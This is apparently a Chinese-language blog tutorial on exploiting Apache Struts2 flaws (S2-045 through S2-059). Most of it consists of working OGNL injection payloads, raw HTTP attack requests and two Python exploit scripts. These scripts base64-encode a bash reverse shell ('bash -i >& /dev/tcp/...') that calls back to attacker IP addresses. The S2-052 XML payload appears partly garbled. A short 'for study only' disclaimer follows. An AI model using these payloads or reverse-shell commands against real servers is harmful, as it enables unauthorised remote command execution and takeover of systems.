Strtus2漏洞

Strtus2框架识别

注：1、如果使用http协议不能用“cd”切换目录

2、Java反弹shell必须用base64编码之后使用，例如：

1.初始反弹shell脚本：bash -i >& /dev/tcp/124.71.45.28/7890 0>&1

2.base64编码：YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuNzEuNDUuMjgvNzg5MCAwPiYx

3.添加base64 -d解码与bash -i执行：echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuNzEuNDUuMjgvNzg5MCAwPiYx|base64 -d|bash -i

S2-045

命令执行

随便上传一个文档，抓包修改content-type

Content-type修改为：

Content-Type:"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

执行命令成功

反弹shell

1.初始反弹shell脚本：bash -i >& /dev/tcp/8.141.89.1/6666 0>&1

2.base64编码：YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE0MS44OS4xLzY2NjYgMD4mMQ==

3.添加base64 -d解码与bash -i执行：echo YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE0MS44OS4xLzY2NjYgMD4mMQ==|base64 -d|bash -i

4.将echo YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE0MS44OS4xLzY2NjYgMD4mMQ==|base64 -d|bash -i 插入到上面payload中的命令执行函数中

反弹shell成功

S2-059

反弹shell

Exp：

# -*- coding: utf-8 -*-

# @time : 2022/2/23 0023 14:42

# @Author : mingy

# @File : S2-059.py

# @Software : PyCharm

import requests

import base64

# 靶机地址 URL

target_url = "http://8.141.89.1:8080/"

# 接收反弹shell 攻击机IP

reverse_ip = "8.141.89.1"

# 接收反弹shell 攻击机端口

reverse_port = "6666"

bash_reverse_shell = "bash -i >& /dev/tcp/" + reverse_ip + "/" + reverse_port + " 0>&1"

data1 = {

"id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"

}

data2 = {

"id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)).(@java.lang.Runtime@getRuntime().exec('bash -c {echo," + str(base64.b64encode(bash_reverse_shell.encode('utf-8')), "utf-8") +"}|{base64,-d}|{bash,-i}'))}"

}

res1 = requests.post(target_url, data=data1)

res2 = requests.post(target_url, data=data2)

反弹shell成功

S2-057

漏洞探测：

/struts2-showcase/${(1+1)}/actionChain1.action

注：${(1+1)} 必须要URL编码

将uri替换为/struts2-showcase/%24%7B(1%2B1)%7D/actionChain1.action

执行结果为2，探测有漏洞

漏洞利用：

插入payload：

/struts2-showcase/%24%7B%28%23dm%[email protected]@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%[email protected]@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27whoami%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D/actionChain1.action

命令执行成功

S2-053

信息收集找到api

插入payload：

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

命令执行成功

S2-052

含有漏洞的API的请求包：

POST /orders/3 HTTP/1.1

Host: 8.141.89.1:8080

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/xml

Content-Length: 2063

<map>

<entry>

<jdk.nashorn.internal.objects.NativeString>

<initialized>false</initialized>

<string>touch</string>

<string>/tmp/success</string>

</command>

<redirectErrorStream>false</redirectErrorStream>

</next>

</iter>

<class>java.lang.ProcessBuilder</class>

<name>start</name>

<parameter-types/>

</method>

</filter>

</serviceIterator>

<lock/>

</cipher>

<done>false</done>

<closed>false</closed>

</is>

<consumed>false</consumed>

</dataSource>

</dataHandler>

</value>

</jdk.nashorn.internal.objects.NativeString>

<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>

</entry>

<entry>

<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

</entry>

</map>

将上述标红的替换为payload：

</command>

获得shell

S2-048

信息收集找到如下页面

一、将payload插入name框中：

命令执行成功

二、使用bp抓包，将payload替换掉name的值

%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

命令执行成功

S2-046

信息收集找到下面API

Bp抓包，漏洞点在name，将下面payload插入到name的值中

POST /doUpload.action HTTP/1.1

Host: localhost:8080

Content-Length: 10000000

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z

Connection: close

------WebKitFormBoundaryAnmUgTEhFhOZpr9z

Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',1+1)}\xb"

Content-Type: text/plain

Kaboom

------WebKitFormBoundaryAnmUgTEhFhOZpr9z--

进行漏洞探测，返回值为2，表示存在此漏洞

将命令执行payload插入到name的值中：

%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}b

漏洞利用成功

S2-045

漏洞点在POST请求头中的CONTENT-TYPE

Exp：

import requests

import base64

# 靶机地址 URL

target_url = "http://8.141.89.1:8080/"

# 接收反弹shell 攻击机IP

reverse_ip = "8.141.89.1"

# 接收反弹shell 攻击机端口

reverse_port = "6666"

bash_reverse_shell = "bash -i >& /dev/tcp/" + reverse_ip + "/" + reverse_port + " 0>&1"

headers = {

"Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo " + str(base64.b64encode(bash_reverse_shell.encode('utf-8')), "utf-8") + "|base64 -d|bash -i').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"

}

rep = requests.post(url=target_url, headers=headers)

成功反弹shell

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）

Strtus2框架识别

注：1、如果使用http协议不能用“cd”切换目录

2、Java反弹shell必须用base64编码之后使用，例如：

S2-045

命令执行

反弹shell

S2-059

反弹shell

S2-057

S2-053

S2-052

S2-048

S2-046

S2-045

相关文章

发布评论取消回复

Strtus2漏洞

Strtus2框架识别

注：1、如果使用http协议不能用“cd”切换目录

2、Java反弹shell必须用base64编码之后使用，例如：

S2-045

命令执行

反弹shell

S2-059

反弹shell

S2-057

S2-053

S2-052

S2-048

S2-046

S2-045

相关文章：

相关文章

发布评论 取消回复

发布评论取消回复